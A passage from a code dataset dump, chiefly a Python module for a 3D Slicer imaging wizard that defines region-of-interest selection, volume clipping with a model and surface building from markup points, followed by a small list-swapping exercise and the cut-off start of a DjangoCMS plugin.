ROI Model: \", self.__clippingModelSelector)\n\n\t\tself.__clippingMarkupSelector = slicer.qMRMLNodeComboBox()\n\t\tself.__clippingMarkupSelector.nodeTypes = ((\"vtkMRMLMarkupsFiducialNode\"), \"\")\n\t\tself.__clippingMarkupSelector.addEnabled = True\n\t\tself.__clippingMarkupSelector.removeEnabled = False\n\t\tself.__clippingMarkupSelector.noneEnabled = True\n\t\tself.__clippingMarkupSelector.showHidden = False\n\t\tself.__clippingMarkupSelector.renameEnabled = True\n\t\tself.__clippingMarkupSelector.baseName = \"Markup\"\n\t\tself.__clippingMarkupSelector.setMRMLScene(slicer.mrmlScene)\n\t\tself.__clippingMarkupSelector.setToolTip(\"Use markup points to determine a convex ROI.\")\n\t\tModelFormLayout.addRow(\"Curved ROI Markups: \", self.__clippingMarkupSelector)\n\n\t\t# ROICollapisbleButton = ctk.ctkCollapsibleButton()\n\t\t# ROICollapisbleButton.text = \"Cubic ROI:\"\n\t\t# # ROICollapisbleButton.collapse()\n\t\t# # print dir(ROICollapisbleButton)\n\t\t# self.__layout.addWidget(ROICollapisbleButton)\n\t\t# ROIFormLayout = qt.QFormLayout(ROICollapisbleButton)\n\n\t\t# self.valueEditWidgets = {\"ClipOutsideSurface\": True, \"FillValue\": 0}\n\t\t# # self.nodeSelectorWidgets = {\"InputVolume\": self.inputVolumeSelector, \"ClippingModel\": self.clippingModelSelector, \"ClippingMarkup\": self.clippingMarkupSelector, \"OutputVolume\": self.outputVolumeSelector}\n\n\t\t# roiLabel = qt.QLabel( 'Select ROI:' )\n\t\t# self.__roiSelector = slicer.qMRMLNodeComboBox()\n\t\t# self.__roiSelector.nodeTypes = ['vtkMRMLAnnotationROINode']\n\t\t# self.__roiSelector.toolTip = \"ROI defining the structure of interest\"\n\t\t# self.__roiSelector.setMRMLScene(slicer.mrmlScene)\n\t\t# self.__roiSelector.addEnabled = 1\n\t\t# self.__roiSelector.setEnabled(0)\n\n\t\t# ROIFormLayout.addRow( roiLabel, self.__roiSelector )\n\n\t\t# self.__roiSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onROIChanged)\n\n\t\t# voiGroupBox = qt.QGroupBox()\n\t\t# voiGroupBox.setTitle( 'Define ROI' )\n\t\t# ROIFormLayout.addRow( voiGroupBox )\n\n\t\t# voiGroupBoxLayout = qt.QFormLayout( voiGroupBox )\n\n\t\t# # PythonQt has a pre-configured ROI widget. 
Useful!\n\t\t# self.__roiWidget = PythonQt.qSlicerAnnotationsModuleWidgets.qMRMLAnnotationROIWidget()\n\t\t# voiGroupBoxLayout.addRow( self.__roiWidget )\n\t\t# self.__roiWidget.setEnabled(0)\n\n\t\t# Intialize Volume Rendering...\n\t\tself.__vrLogic = slicer.modules.volumerendering.logic()\n\n\t\tqt.QTimer.singleShot(0, self.killButton)\n\n\t\t# self.__clippingModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onClippingModelSelect)\n\t\tself.__clippingMarkupSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onClippingMarkupSelect)\n\n\tdef cleanup(self):\n\t\tself.removeGUIObservers()\n\t\tself.setAndObserveParameterNode(None)\n\t\tself.setAndObserveClippingMarkupNode(None)\n\t\tpass\n\n\tdef setAndObserveParameterNode(self, parameterNode):\n\t\tif parameterNode == self.__parameterNode and self.__parameterNodeObserver:\n\t\t\t# no change and node is already observed\n\t\t\treturn\n\t\t# Remove observer to old parameter node\n\t\tif self.__parameterNode and self.__parameterNodeObserver:\n\t\t\tself.__parameterNode.RemoveObserver(self.__parameterNodeObserver)\n\t\t\tself.__parameterNodeObserver = None\n\t\t# Set and observe new parameter node\n\t\tself.__parameterNode = parameterNode\n\t\tif self.__parameterNode:\n\t\t\tself.__parameterNodeObserver = self.__parameterNode.AddObserver(vtk.vtkCommand.ModifiedEvent, self.onParameterNodeModified)\n\t\t# Update GUI\n\t\tself.updateGUIFromParameterNode()\n\n\tdef setAndObserveClippingMarkupNode(self, clippingMarkupNode):\n\t\tif clippingMarkupNode == self.__clippingMarkupNode and self.__clippingMarkupNodeObserver:\n\t\t\t# no change and node is already observed\n\t\t\treturn\n\t\t# Remove observer to old parameter node\n\t\tif self.__clippingMarkupNode and self.__clippingMarkupNodeObserver:\n\t\t\tself.__clippingMarkupNode.RemoveObserver(self.__clippingMarkupNodeObserver)\n\t\t\tself.__clippingMarkupNodeObserver = None\n\t\t# Set and observe new parameter node\n\t\tself.__clippingMarkupNode = clippingMarkupNode\n\t\tif self.__clippingMarkupNode:\n\t\t\tself.__clippingMarkupNodeObserver = self.__clippingMarkupNode.AddObserver(vtk.vtkCommand.ModifiedEvent, self.onClippingMarkupNodeModified)\n\t\t# Update GUI\n\t\tself.updateModelFromClippingMarkupNode()\n\n\tdef onClippingMarkupNodeModified(self, observer, eventid):\n\t\tself.updateModelFromClippingMarkupNode()\n\n\tdef onParameterNodeModified(self, observer, eventid):\n\t\tself.updateGUIFromParameterNode()\n\n\tdef getParameterNode(self):\n\t\treturn self.__parameterNode\n\n\tdef updateModelFromClippingMarkupNode(self):\n\t\tif not self.__clippingMarkupNode or not self.__clippingModelSelector.currentNode():\n\t\t\treturn\n\t\tself.__logic.updateModelFromMarkup(self.__clippingMarkupNode, self.__clippingModelSelector.currentNode())\n\n\tdef onClippingMarkupSelect(self, node):\n\t\tself.setAndObserveClippingMarkupNode(self.__clippingMarkupSelector.currentNode())\n\n\tdef killButton(self):\n\n\t\t# ctk creates a useless final page button. 
This method gets rid of it.\n\t\tbl = slicer.util.findChildren(text='ReviewStep')\n\t\tif len(bl):\n\t\t\tbl[0].hide()\n\n\t# def onROIChanged(self):\n\n\t# \t\"\"\" This method accounts for changing ROI nodes entirely, rather than the\n\t# \t\tparameters of individual nodes.\n\t# \t\"\"\"\n\n\t# \troi = self.__roiSelector.currentNode()\n\n\t# \tif roi != None:\n\t# \t\tself.__roi = roi\n\t\n\t# \t\tpNode = self.parameterNode()\n\n\t# \t\tself.__vrDisplayNode.SetAndObserveROINodeID(roi.GetID())\n\t# \t\tself.__vrDisplayNode.SetCroppingEnabled(1)\n\t# \t\tself.__vrDisplayNode.VisibilityOn()\n\n\t# \t\troi.SetAndObserveTransformNodeID(self.__roiTransformNode.GetID())\n\n\t# \t\t# Removes unneeded observers, freeing running time.\n\t# \t\tif self.__roiObserverTag != None:\n\t# \t\t\tself.__roi.RemoveObserver(self.__roiObserverTag)\n\n\t# \t\tself.__roiObserverTag = self.__roi.AddObserver('ModifiedEvent', self.processROIEvents)\n\n\t# \t\troi.SetInteractiveMode(1)\n\n\t# \t\tself.__roiWidget.setMRMLAnnotationROINode(roi)\n\t# \t\tself.__roi.SetDisplayVisibility(1)\n\t \n\t# def processROIEvents(self,node,event):\n\t# \t\"\"\" A rather repetitive step that does the hard work of computing\n\t# \t\tIJK boundaries in vtk and RAS boundaries in Slicer. Also adjusts\n\t# \t\tthe opacity of the volume rendering node.\n\t# \t\"\"\"\n\n\t# \t# Get the IJK bounding box of the voxels inside ROI.\n\t# \troiCenter = [0,0,0]\n\t# \troiRadius = [0,0,0]\n\n\t# \t# Note that these methods modify roiCenter and roiRadius.\n\t# \tself.__roi.GetXYZ(roiCenter)\n\t# \tself.__roi.GetRadiusXYZ(roiRadius)\n\n\t# \t# TO-DO: Understand coordinate changes being performed.\n\t# \troiCorner1 = [roiCenter[0]+roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner2 = [roiCenter[0]+roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\t# \troiCorner3 = [roiCenter[0]+roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner4 = [roiCenter[0]+roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\t# \troiCorner5 = [roiCenter[0]-roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner6 = [roiCenter[0]-roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\t# \troiCorner7 = [roiCenter[0]-roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner8 = [roiCenter[0]-roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\n\t# \tras2ijk = vtk.vtkMatrix4x4()\n\t# \tself.__subtractVolume.GetRASToIJKMatrix(ras2ijk)\n\n\t# \troiCorner1ijk = ras2ijk.MultiplyPoint(roiCorner1)\n\t# \troiCorner2ijk = ras2ijk.MultiplyPoint(roiCorner2)\n\t# \troiCorner3ijk = ras2ijk.MultiplyPoint(roiCorner3)\n\t# \troiCorner4ijk = ras2ijk.MultiplyPoint(roiCorner4)\n\t# \troiCorner5ijk = ras2ijk.MultiplyPoint(roiCorner5)\n\t# \troiCorner6ijk = ras2ijk.MultiplyPoint(roiCorner6)\n\t# \troiCorner7ijk = ras2ijk.MultiplyPoint(roiCorner7)\n\t# \troiCorner8ijk = ras2ijk.MultiplyPoint(roiCorner8)\n\n\t# \tlowerIJK = [0, 0, 0]\n\t# \tupperIJK = [0, 0, 0]\n\n\t# \tlowerIJK[0] = min(roiCorner1ijk[0],roiCorner2ijk[0],roiCorner3ijk[0],roiCorner4ijk[0],roiCorner5ijk[0],roiCorner6ijk[0],roiCorner7ijk[0],roiCorner8ijk[0])\n\t# \tlowerIJK[1] = min(roiCorner1ijk[1],roiCorner2ijk[1],roiCorner3ijk[1],roiCorner4ijk[1],roiCorner5ijk[1],roiCorner6ijk[1],roiCorner7ijk[1],roiCorner8ijk[1])\n\t# \tlowerIJK[2] = 
min(roiCorner1ijk[2],roiCorner2ijk[2],roiCorner3ijk[2],roiCorner4ijk[2],roiCorner5ijk[2],roiCorner6ijk[2],roiCorner7ijk[2],roiCorner8ijk[2])\n\n\t# \tupperIJK[0] = max(roiCorner1ijk[0],roiCorner2ijk[0],roiCorner3ijk[0],roiCorner4ijk[0],roiCorner5ijk[0],roiCorner6ijk[0],roiCorner7ijk[0],roiCorner8ijk[0])\n\t# \tupperIJK[1] = max(roiCorner1ijk[1],roiCorner2ijk[1],roiCorner3ijk[1],roiCorner4ijk[1],roiCorner5ijk[1],roiCorner6ijk[1],roiCorner7ijk[1],roiCorner8ijk[1])\n\t# \tupperIJK[2] = max(roiCorner1ijk[2],roiCorner2ijk[2],roiCorner3ijk[2],roiCorner4ijk[2],roiCorner5ijk[2],roiCorner6ijk[2],roiCorner7ijk[2],roiCorner8ijk[2])\n\n\t# \t# All of this ijk work is needed for using vtk to compute a sub-region.\n\t# \timage = self.__subtractVolume.GetImageData()\n\t# \tclipper = vtk.vtkImageClip()\n\t# \tclipper.ClipDataOn()\n\t# \tclipper.SetOutputWholeExtent(int(lowerIJK[0]),int(upperIJK[0]),int(lowerIJK[1]),int(upperIJK[1]),int(lowerIJK[2]),int(upperIJK[2]))\n\t# \tif vtk.VTK_MAJOR_VERSION <= 5:\n\t# \t\tclipper.SetInput(image)\n\t# \telse:\n\t# \t\tclipper.SetInputData(image)\n\t# \tclipper.Update()\n\t# \troiImageRegion = clipper.GetOutput()\n\n\t# \t# Opacity thresholds are constantly adjusted to the range of pixels within the ROI.\n\t# \tintRange = roiImageRegion.GetScalarRange()\n\t# \tlThresh = 0.4*(intRange[0]+intRange[1])\n\t# \tuThresh = intRange[1]\n\n\t# \tself.__vrOpacityMap.RemoveAllPoints()\n\t# \tself.__vrOpacityMap.AddPoint(0,0)\n\t# \tself.__vrOpacityMap.AddPoint(lThresh-1,0)\n\t# \tself.__vrOpacityMap.AddPoint(lThresh,1)\n\t# \tself.__vrOpacityMap.AddPoint(uThresh,1)\n\t# \tself.__vrOpacityMap.AddPoint(uThresh+1,0)\n\n\t# \t# Center the camera on the new ROI. Author of ChangeTracker suggested errors in this method.\n\t# \tcamera = slicer.mrmlScene.GetNodeByID('vtkMRMLCameraNode1')\n\t# \tcamera.SetFocalPoint(roiCenter)\n\n\tdef validate( self, desiredBranchId ):\n\n\t\t# Makes sure there actually is a ROI...\n\t\t# roi = self.__roiSelector.currentNode()\n\n\t\tif not (self.__clippingMarkupSelector.currentNode() or self.__clippingMarkupSelector.currentNode()):\n\t\t\tself.__parent.validationFailed(desiredBranchId, 'Error', 'You must choose at least one ROI to continue.')\n\t\t\t\n\t\tself.__parent.validationSucceeded(desiredBranchId)\n\n\tdef onEntry(self,comingFrom,transitionType):\n\n\t\t\"\"\" This method calls most other methods in this function to initialize the ROI\n\t\t\twizard. This step in particular applies the ROI IJK/RAS coordinate transform\n\t\t\tcalculated in the previous step and checks for any pre-existing ROIs. Also\n\t\t\tintializes the volume-rendering node.\n\t\t\"\"\"\n\n\t\tsuper(ROIStep, self).onEntry(comingFrom, transitionType)\n\n\t\t# I believe this changes the layout to four-up; will check.\n\t\tlm = slicer.app.layoutManager()\n\t\tlm.setLayout(3)\n\t\tpNode = self.parameterNode()\n\t\tHelper.SetLabelVolume(None)\n\t\tself.__subtractVolume = slicer.mrmlScene.GetNodeByID(pNode.GetParameter('subtractVolumeID'))\n\t\tHelper.SetBgFgVolumes(pNode.GetParameter('subtractVolumeID'),'')\n\n\t\tslices = [lm.sliceWidget('Red'),lm.sliceWidget('Yellow'),lm.sliceWidget('Green')]\n\t\tfor s in slices:\n\t\t\ts.sliceLogic().GetSliceNode().SetSliceVisible(0)\n\n\t\t# Apply the transform node created in the previous step.\n\t\troiTfmNodeID = pNode.GetParameter('roiTransformID')\n\t\tif roiTfmNodeID != '':\n\t\t\tself.__roiTransformNode = Helper.getNodeByID(roiTfmNodeID)\n\t\telse:\n\t\t\tHelper.Error('Internal error! 
Error code CT-S2-NRT, please report!')\n\n\t\t# If a ROI exists, grab it. Note that this function calls onROIChanged()\n\t\t# self.updateWidgetFromParameterNode(pNode)\n\n\t\t# Note that this clause initializes volume rendering.\n\t\tif self.__roi != None:\n\t\t\tself.__roi.SetDisplayVisibility(1)\n\t\t\t# self.InitVRDisplayNode()\n\n\t\tpNode.SetParameter('currentStep', self.stepid)\n\t\t\n\t\tqt.QTimer.singleShot(0, self.killButton)\n\n\tdef onExit(self, goingTo, transitionType):\n\n\t\t# Does a great deal of work to prepare for the segmentation step.\n\t\tself.ThresholdPrep()\n\n\t\tpNode = self.parameterNode()\n\n\t\tlm = slicer.app.layoutManager()\n\t\tslices = [lm.sliceWidget('Red'),lm.sliceWidget('Yellow'),lm.sliceWidget('Green')]\n\t\tfor s in slices:\n\t\t\ts.sliceLogic().GetSliceNode().SetSliceVisible(0)\n\n\t\tpNode.SetParameter('clippingModelNodeID', self.__clippingModelSelector.currentNode().GetID())\n\t\tpNode.SetParameter('clippingMarkupNodeID', self.__clippingMarkupSelector.currentNode().GetID())\n\t\tself.__clippingModelSelector.currentNode().GetDisplayNode().VisibilityOff()\n\t\tself.__clippingMarkupSelector.currentNode().GetDisplayNode().VisibilityOff()\n\n\t\tif self.__roi != None:\n\t\t\tself.__roi.RemoveObserver(self.__roiObserverTag)\n\t\t\tself.__roi.SetDisplayVisibility(0)\n\n\t\tif self.__vrDisplayNode != None:\n\t\t\t# self.__vrDisplayNode.VisibilityOff()\n\t\t\tpNode.SetParameter('vrDisplayNodeID', self.__vrDisplayNode.GetID())\n\n\t\tif self.__CubicROI:\n\t\t\tpNode.SetParameter('roiNodeID', self.__roiSelector.currentNode().GetID())\n\n\t\tsuper(ROIStep, self).onExit(goingTo, transitionType)\n\n\tdef updateWidgetFromParameterNode(self, parameterNode):\n\n\t\t\"\"\" Effectively creates the ROI node upon entry, and then uses onROIChanged\n\t\t\tto calculate its intial position.\n\t\t\"\"\"\n\n\t\troiNodeID = parameterNode.GetParameter('roiNodeID')\n\n\t\tif roiNodeID != '':\n\t\t\tself.__roi = slicer.mrmlScene.GetNodeByID(roiNodeID)\n\t\t\tself.__roiSelector.setCurrentNode(Helper.getNodeByID(self.__roi.GetID()))\n\t\telse:\n\t\t\troi = slicer.vtkMRMLAnnotationROINode()\n\t\t\troi.Initialize(slicer.mrmlScene)\n\t\t\tparameterNode.SetParameter('roiNodeID', roi.GetID())\n\t\t\tself.__roiSelector.setCurrentNode(roi)\n\t\t\n\t\tself.onROIChanged()\n\t\t\n\tdef ThresholdPrep(self):\n\n\t\t\"\"\" This method prepares for the following segmentation/thresholding\n\t\t\tstep. It accomplishes a few things. It uses the cropvolume Slicer\n\t\t\tmodule to create a new, ROI-only node. 
It then creates a label volume\n\t\t\tand initializes threholds variables for the next step.\n\t\t\"\"\"\n\n\t\tpNode = self.parameterNode()\n\t\tbaselineVolumeID = pNode.GetParameter('baselineVolumeID')\n\t\tfollowupVolumeID = pNode.GetParameter('followupVolumeID')\n\n\t\tfollowupVolume = Helper.getNodeByID(followupVolumeID)\n\t\tbaselineVolume = Helper.getNodeByID(baselineVolumeID)\n\n\t\tif self.__ConvexROI:\n\t\t\toutputVolume = slicer.vtkMRMLScalarVolumeNode()\n\t\t\tslicer.mrmlScene.AddNode(outputVolume)\n\n\t\t\tHelper.SetLabelVolume(None)\n\n\t\t\t# Crop volume to Convex ROI\n\t\t\tinputVolume = self.__subtractVolume\n\t\t\toutputVolume = outputVolume\n\t\t\tclippingModel = self.__clippingModelSelector.currentNode()\n\t\t\tclipOutsideSurface = True\n\t\t\tfillValue = inputVolume.GetImageData().GetScalarRange()[0] - 1\n\n\t\t\tself.__logic.clipVolumeWithModel(inputVolume, clippingModel, clipOutsideSurface, fillValue, outputVolume)\n\n\t\t\tself.__logic.showInSliceViewers(outputVolume, [\"Red\", \"Yellow\", \"Green\"])\n\n\t\t\toutputVolume.SetName(baselineVolume.GetName() + '_subtraction_roi')\n\t\t\tpNode.SetParameter('croppedSubtractVolumeID',outputVolume.GetID())\n\t\t\tpNode.SetParameter('ROIType', 'convex')\n\n\t\tif self.__CubicROI:\n\t\t\t# Crop volume to Cubic ROI.\n\t\t\tcropVolumeNode = slicer.vtkMRMLCropVolumeParametersNode()\n\t\t\tcropVolumeNode.SetScene(slicer.mrmlScene)\n\t\t\tcropVolumeNode.SetName('T1_Contrast_CropVolume_node')\n\t\t\tcropVolumeNode.SetIsotropicResampling(True)\n\t\t\tcropVolumeNode.SetSpacingScalingConst(0.5)\n\t\t\tslicer.mrmlScene.AddNode(cropVolumeNode)\n\n\t\t\tcropVolumeNode.SetInputVolumeNodeID(pNode.GetParameter('subtractVolumeID'))\n\t\t\tcropVolumeNode.SetROINodeID(pNode.GetParameter('roiNodeID'))\n\n\t\t\tcropVolumeLogic = slicer.modules.cropvolume.logic()\n\t\t\tcropVolumeLogic.Apply(cropVolumeNode)\n\n\t\t\toutputVolume = slicer.mrmlScene.GetNodeByID(cropVolumeNode.GetOutputVolumeNodeID())\n\t\t\toutputVolume.SetName(baselineVolume.GetName() + '_subtraction_roi')\n\t\t\tpNode.SetParameter('croppedSubtractVolumeID',cropVolumeNode.GetOutputVolumeNodeID())\n\n\t\t\tpNode.SetParameter('ROIType', 'cubic')\n\n\t\t# Get starting threshold parameters.\n\t\troiSegmentationID = pNode.GetParameter('croppedSubtractVolumeSegmentationID') \n\t\tif roiSegmentationID == '':\n\t\t\troiRange = outputVolume.GetImageData().GetScalarRange()\n\n\t\t\tthresholdParameter = str(0.5*(roiRange[0]+roiRange[1]))+','+str(roiRange[1])\n\t\t\tpNode.SetParameter('thresholdRange', thresholdParameter)\n\n\t\t# Create a label node for segmentation.\n\t\tvl = slicer.modules.volumes.logic()\n\t\troiSegmentation = vl.CreateLabelVolume(slicer.mrmlScene, outputVolume, baselineVolume.GetName() + '_subtraction_annotation')\n\t\tpNode.SetParameter('croppedSubtractVolumeSegmentationID', roiSegmentation.GetID())\n\nclass VolumeClipWithModelLogic(ScriptedLoadableModuleLogic):\n\t\"\"\"This class should implement all the actual\n\tcomputation done by your module. 
The interface\n\tshould be such that other python code can import\n\tthis class and make use of the functionality without\n\trequiring an instance of the Widget\n\t\"\"\"\n\n\tdef createParameterNode(self):\n\t\t# Set default parameters\n\t\tnode = ScriptedLoadableModuleLogic.createParameterNode(self)\n\t\tnode.SetName(slicer.mrmlScene.GetUniqueNameByString(self.moduleName))\n\t\tnode.SetParameter(\"ClipOutsideSurface\", \"1\")\n\t\tnode.SetParameter(\"FillValue\", \"-1\")\n\t\treturn node\n\n\tdef clipVolumeWithModel(self, inputVolume, clippingModel, clipOutsideSurface, fillValue, outputVolume):\n\t\t\"\"\"\n\t\tFill voxels of the input volume inside/outside the clipping model with the provided fill value\n\t\t\"\"\"\n\t\t\n\t\t# Determine the transform between the box and the image IJK coordinate systems\n\t\t\n\t\trasToModel = vtk.vtkMatrix4x4() \n\t\tif clippingModel.GetTransformNodeID() != None:\n\t\t\tmodelTransformNode = slicer.mrmlScene.GetNodeByID(clippingModel.GetTransformNodeID())\n\t\t\tboxToRas = vtk.vtkMatrix4x4()\n\t\t\tmodelTransformNode.GetMatrixTransformToWorld(boxToRas)\n\t\t\trasToModel.DeepCopy(boxToRas)\n\t\t\trasToModel.Invert()\n\t\t\t\n\t\tijkToRas = vtk.vtkMatrix4x4()\n\t\tinputVolume.GetIJKToRASMatrix( ijkToRas )\n\n\t\tijkToModel = vtk.vtkMatrix4x4()\n\t\tvtk.vtkMatrix4x4.Multiply4x4(rasToModel,ijkToRas,ijkToModel)\n\t\tmodelToIjkTransform = vtk.vtkTransform()\n\t\tmodelToIjkTransform.SetMatrix(ijkToModel)\n\t\tmodelToIjkTransform.Inverse()\n\t\t\n\t\ttransformModelToIjk=vtk.vtkTransformPolyDataFilter()\n\t\ttransformModelToIjk.SetTransform(modelToIjkTransform)\n\t\ttransformModelToIjk.SetInputConnection(clippingModel.GetPolyDataConnection())\n\n\t\t# Use the stencil to fill the volume\n\t\t\n\t\t# Convert model to stencil\n\t\tpolyToStencil = vtk.vtkPolyDataToImageStencil()\n\t\tpolyToStencil.SetInputConnection(transformModelToIjk.GetOutputPort())\n\t\tpolyToStencil.SetOutputSpacing(inputVolume.GetImageData().GetSpacing())\n\t\tpolyToStencil.SetOutputOrigin(inputVolume.GetImageData().GetOrigin())\n\t\tpolyToStencil.SetOutputWholeExtent(inputVolume.GetImageData().GetExtent())\n\t\t\n\t\t# Apply the stencil to the volume\n\t\tstencilToImage=vtk.vtkImageStencil()\n\t\tstencilToImage.SetInputConnection(inputVolume.GetImageDataConnection())\n\t\tstencilToImage.SetStencilConnection(polyToStencil.GetOutputPort())\n\t\tif clipOutsideSurface:\n\t\t\tstencilToImage.ReverseStencilOff()\n\t\telse:\n\t\t\tstencilToImage.ReverseStencilOn()\n\t\tstencilToImage.SetBackgroundValue(fillValue)\n\t\tstencilToImage.Update()\n\n\t\t# Update the volume with the stencil operation result\n\t\toutputImageData = vtk.vtkImageData()\n\t\toutputImageData.DeepCopy(stencilToImage.GetOutput())\n\t\t\n\t\toutputVolume.SetAndObserveImageData(outputImageData)\n\t\toutputVolume.SetIJKToRASMatrix(ijkToRas)\n\n\t\t# Add a default display node to output volume node if it does not exist yet\n\t\tif not outputVolume.GetDisplayNode():\n\t\t\tdisplayNode=slicer.vtkMRMLScalarVolumeDisplayNode()\n\t\t\tdisplayNode.SetAndObserveColorNodeID(\"vtkMRMLColorTableNodeGrey\")\n\t\t\tslicer.mrmlScene.AddNode(displayNode)\n\t\t\toutputVolume.SetAndObserveDisplayNodeID(displayNode.GetID())\n\n\t\treturn True\n\n\tdef updateModelFromMarkup(self, inputMarkup, outputModel):\n\t\t\"\"\"\n\t\tUpdate model to enclose all points in the input markup list\n\t\t\"\"\"\n\t\t\n\t\t# Delaunay triangulation is robust and creates nice smooth surfaces from a small number of points,\n\t\t# however it can only generate convex surfaces 
robustly.\n\t\tuseDelaunay = True\n\t\t\n\t\t# Create polydata point set from markup points\n\t\t\n\t\tpoints = vtk.vtkPoints()\n\t\tcellArray = vtk.vtkCellArray()\n\t\t\n\t\tnumberOfPoints = inputMarkup.GetNumberOfFiducials()\n\t\t\n\t\t# Surface generation algorithms behave unpredictably when there are not enough points;\n\t\t# return if there are very few points\n\t\tif useDelaunay:\n\t\t\tif numberOfPoints<3:\n\t\t\t\treturn\n\t\telse:\n\t\t\tif numberOfPoints<10:\n\t\t\t\treturn\n\n\t\tpoints.SetNumberOfPoints(numberOfPoints)\n\t\tnew_coord = [0.0, 0.0, 0.0]\n\n\t\tfor i in range(numberOfPoints):\n\t\t\tinputMarkup.GetNthFiducialPosition(i,new_coord)\n\t\t\tpoints.SetPoint(i, new_coord)\n\n\t\tcellArray.InsertNextCell(numberOfPoints)\n\t\tfor i in range(numberOfPoints):\n\t\t\tcellArray.InsertCellPoint(i)\n\n\t\tpointPolyData = vtk.vtkPolyData()\n\t\tpointPolyData.SetLines(cellArray)\n\t\tpointPolyData.SetPoints(points)\n\n\t\t\n\t\t# Create surface from point set\n\n\t\tif useDelaunay:\n\t\t\t\t\t\n\t\t\tdelaunay = vtk.vtkDelaunay3D()\n\t\t\tdelaunay.SetInputData(pointPolyData)\n\n\t\t\tsurfaceFilter = vtk.vtkDataSetSurfaceFilter()\n\t\t\tsurfaceFilter.SetInputConnection(delaunay.GetOutputPort())\n\n\t\t\tsmoother = vtk.vtkButterflySubdivisionFilter()\n\t\t\tsmoother.SetInputConnection(surfaceFilter.GetOutputPort())\n\t\t\tsmoother.SetNumberOfSubdivisions(3)\n\t\t\tsmoother.Update()\n\n\t\t\toutputModel.SetPolyDataConnection(smoother.GetOutputPort())\n\t\t\t\n\t\telse:\n\t\t\t\n\t\t\tsurf = vtk.vtkSurfaceReconstructionFilter()\n\t\t\tsurf.SetInputData(pointPolyData)\n\t\t\tsurf.SetNeighborhoodSize(20)\n\t\t\tsurf.SetSampleSpacing(80) # a lower value follows small details more closely, but then a denser input point set is needed\n\n\t\t\tcf = vtk.vtkContourFilter()\n\t\t\tcf.SetInputConnection(surf.GetOutputPort())\n\t\t\tcf.SetValue(0, 0.0)\n\n\t\t\t# Sometimes the contouring algorithm can create a volume whose gradient\n\t\t\t# vector and ordering of polygon (using the right hand rule) are\n\t\t\t# inconsistent. 
vtkReverseSense cures this problem.\n\t\t\treverse = vtk.vtkReverseSense()\n\t\t\treverse.SetInputConnection(cf.GetOutputPort())\n\t\t\treverse.ReverseCellsOff()\n\t\t\treverse.ReverseNormalsOff()\n\n\t\t\toutputModel.SetPolyDataConnection(reverse.GetOutputPort())\n\n\t\t# Create default model display node if it does not exist yet\n\t\tif not outputModel.GetDisplayNode():\n\t\t\tmodelDisplayNode = slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLModelDisplayNode\")\n\t\t\tmodelDisplayNode.SetColor(0,0,1) # Blue\n\t\t\tmodelDisplayNode.BackfaceCullingOff()\n\t\t\tmodelDisplayNode.SliceIntersectionVisibilityOn()\n\t\t\tmodelDisplayNode.SetOpacity(0.3) # Between 0-1, 1 being opaque\n\t\t\tslicer.mrmlScene.AddNode(modelDisplayNode)\n\t\t\toutputModel.SetAndObserveDisplayNodeID(modelDisplayNode.GetID())\n\t\n\t\toutputModel.GetDisplayNode().SliceIntersectionVisibilityOn()\n\t\t\t\n\t\toutputModel.Modified()\n\n\tdef showInSliceViewers(self, volumeNode, sliceWidgetNames):\n\t\t# Displays volumeNode in the selected slice viewers as background volume\n\t\t# Existing background volume is pushed to foreground, existing foreground volume will not be shown anymore\n\t\t# sliceWidgetNames is a list of slice view names, such as [\"Yellow\", \"Green\"]\n\t\tif not volumeNode:\n\t\t\treturn\n\t\tnewVolumeNodeID = volumeNode.GetID()\n\t\tfor sliceWidgetName in sliceWidgetNames:\n\t\t\tsliceLogic = slicer.app.layoutManager().sliceWidget(sliceWidgetName).sliceLogic()\n\t\t\tforegroundVolumeNodeID = sliceLogic.GetSliceCompositeNode().GetForegroundVolumeID()\n\t\t\tbackgroundVolumeNodeID = sliceLogic.GetSliceCompositeNode().GetBackgroundVolumeID()\n\t\t\tif foregroundVolumeNodeID == newVolumeNodeID or backgroundVolumeNodeID == newVolumeNodeID:\n\t\t\t\t# new volume is already shown as foreground or background\n\t\t\t\tcontinue\n\t\t\tif backgroundVolumeNodeID:\n\t\t\t\t# there is a background volume, push it to the foreground because we will replace the background volume\n\t\t\t\tsliceLogic.GetSliceCompositeNode().SetForegroundVolumeID(backgroundVolumeNodeID)\n\t\t\t# show the new volume as background\n\t\t\tsliceLogic.GetSliceCompositeNode().SetBackgroundVolumeID(newVolumeNodeID)","repo_name":"AndrewBeers/QTIMSubtractionMap","sub_path":"ContrastSubtractionWizard/ROI.py","file_name":"ROI.py","file_ext":"py","file_size_in_byte":26522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71135529386","text":"# Interchange 1st and last elements in a list.\n\ndef swap_method_1(list):\n    n = len(list)\n    list[0],list[n-1] = list[n-1],list[0]\n    return list\n\ndef swap_method_2(list):\n    a,*b,c = list\n    list = [c,*b,a]\n    return list\n\nn = int(input(\"Enter the size :\"))\nlist = []\nfor i in range(n):\n    while True:\n        try:\n            element = int(input(\"enter the element : \"))\n            list.append(element)\n            break\n        except Exception as e:\n            print(\"Please enter a number only.\")\n\nprint(\"Swapping using the normal way\")\nprint(swap_method_1(list))\n\nprint(\"Swapping the elements using * unpacking\")\nprint(swap_method_2(list))","repo_name":"growdataskills/Python_Fundamentals","sub_path":"python_programs/Interchange_element.py","file_name":"Interchange_element.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"39442900603","text":"\"\"\"SimplePicture plugin for DjangoCMS.\"\"\"\nfrom .defaults import SIMPLEPICTURE_PRESETS\n\n\ndef get_picture_info(instance, 